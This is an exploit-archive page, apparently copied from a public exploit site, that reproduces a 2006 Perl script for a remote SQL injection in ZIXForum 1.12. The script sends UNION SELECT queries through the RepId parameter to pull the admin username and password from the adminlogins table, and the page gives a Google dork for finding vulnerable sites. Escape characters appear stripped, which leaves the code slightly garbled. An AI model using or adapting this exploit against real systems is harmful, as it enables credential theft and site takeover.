Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit
# Published : 2006-09-17
# Author : SlimTim10
# Previous Title : PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability
# Next Title : MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability

#!/usr/bin/perl
###########################################
# ZIXForum <= v1.12 Exploit
# Vulnerability found by Chironex Fleckeri
# Created By: SlimTim10
# <slimtim10@gmail.com>
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################


use IO::Socket::INET;

usage() unless (@ARGV == 2);

$host = shift(@ARGV);
$dir = shift(@ARGV);

$dir = "/$dir" if ($dir !~ /^//);
$dir = "$dir/" if ($dir !~ //$/);
$host =~ s/http:////g;

$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $hostrn"; # show an error!

print "[+]Connecting...n";
print $socket "GET $path HTTP/1.1n";
print $socket "Host: $hostn";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "[+]Connectedn";
print "[+]User: ";

while ($answer = <$socket>) {
    $answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1n";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $hostrn";
print $socket "GET $path2 HTTP/1.1n";
print $socket "Host: $hostn";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "[+]Pass: ";

while ($answer = <$socket>) {
    $answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1n";
}

sub usage {
    print "n" . "=|=-" x 14 . "=|=";
    print q(
]                                                         [
[  ZIXForum <= 1.12 "RepId" Remote SQL Injection Exploit  ]
]               Tested on ZIXForum <= v1.12               [
[       Created By: SlimTim10 <slimtim10@gmail.com>       ]
]                                                         [);
    print "n" . "=|=-" x 14 . "=|=nn";
    print " Usage: $0";
    print q( [HOST] [PATH] E.g. );
    print "$0";
    print q(  www.host.com /forum/);
    print "nn" . "`^" x 29 . "`n";
    exit;
}

# www.Syue.com [2006-09-17]